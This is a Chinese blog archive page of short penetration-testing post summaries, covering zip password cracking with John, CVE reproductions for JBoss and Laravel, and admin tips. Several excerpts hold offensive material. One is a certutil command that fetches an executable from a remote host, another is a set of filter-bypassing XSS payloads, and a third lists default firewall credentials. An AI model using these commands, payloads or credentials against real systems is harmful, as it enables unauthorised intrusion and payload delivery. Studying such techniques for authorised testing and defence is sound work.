2021年5月18日

zip压缩包爆破解压密码

摘要: 先将xxx.zip文件转换成john可破解格式 zip2john xxx.zip >> xxx.txt 使用john破解 john --wordlist=/usr/share/wordlists/rockyou.txt xxx.txt 查看密码 john --show xxx.txt 阅读全文

posted @ 2021-05-18 10:47 tech_lee 阅读(1578) 评论(0) 推荐(0) 编辑

Windows中cmd命令查看文件是否存在

摘要: 例如 attrib C:\programdata\exp.exe 有回显 表示此文件存在。 一般用于验证 文件是否上传成功。 阅读全文

posted @ 2021-05-18 10:45 tech_lee 阅读(2966) 评论(0) 推荐(0) 编辑

Windows通过命令行cmd下载远程文件

摘要: certutil.exe -urlcache -split -f http://192.168.163.128:8080/artifact.exe c:\artifact.exe // c:\artifact.exe是保存路径 阅读全文

posted @ 2021-05-18 10:43 tech_lee 阅读(1417) 评论(0) 推荐(0) 编辑

tomcat设置自定义400页面

摘要: 1、修改%Tomcat_HOME%/conf/server.xml 在Host标签内新增如下内容: <Valve className="org.apache.catalina.valves.ErrorReportValve" showReport="false" showServerInfo="fa 阅读全文

posted @ 2021-05-18 10:42 tech_lee 阅读(1263) 评论(0) 推荐(0) 编辑

Ubuntu 18.04 rc-local设置开机自启动

摘要: Ubuntu 18.04默认进程启动管理已经切换至systemd,不在使用SysV。如果想像之前一样使用/etc/rc.local设置开机自启动,请如下设置 修改rc-local.service /lib/systemd/system/rc-local.service新增: [Install] Wa 阅读全文

posted @ 2021-05-18 10:41 tech_lee 阅读(475) 评论(0) 推荐(0) 编辑

XSS过滤圆括号一些可执行的payload

摘要: <img src=1111111 onerror=alert&lpar;1&rpar;> <img src=1111111 onerror=javascript:alert&#x28;1&#x29> <a href="javascript:alert&#40/1/&#41">axxx</a> <sv 阅读全文

posted @ 2021-05-18 10:38 tech_lee 阅读(918) 评论(0) 推荐(0) 编辑

Windows server 2012 R2服务器出现RC4套件漏洞缺陷的处理方案

摘要: 漏洞成因 RC4这套加密方法是在20世纪末期被研究出来并在2000年左右被大量的网站所使用,但是在02年出现了漏洞且持续了13年才被一个外国大佬所发现。 成因总结来说:就是加密方式太老了,长时间更换网站加密方式导致了攻击者可以进行中间人攻击,能够有效地进行大量用户的嗅探监听和会话劫持。 漏洞影响 攻 阅读全文

posted @ 2021-05-18 10:37 tech_lee 阅读(3048) 评论(0) 推荐(0) 编辑

各个厂商防火墙的初始账号及密码

摘要: 天融信 登录地址 https://192.168.1.254 https://192.168.1.254:8080 用户名 superman 密码 talent 、 talent!23 技术支持热线 8008105119 联想网御 需要证书(最好IE浏览器登录) 登录地址 https://10.1. 阅读全文

posted @ 2021-05-18 10:35 tech_lee 阅读(6674) 评论(0) 推荐(0) 编辑

Jboss反序列化漏洞复现(CVE-2017-12149)

摘要: 一、漏洞描述 该漏洞为Java反序列化错误类型,存在于jboss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 二、漏洞影响版本 Jboss 5.x Jboss 6.x 三 阅读全文

posted @ 2021-05-18 10:29 tech_lee 阅读(626) 评论(0) 推荐(0) 编辑

CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞

摘要: 0x00 漏洞简介 Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 阅读全文

posted @ 2021-05-18 10:05 tech_lee 阅读(2028) 评论(0) 推荐(0) 编辑

导航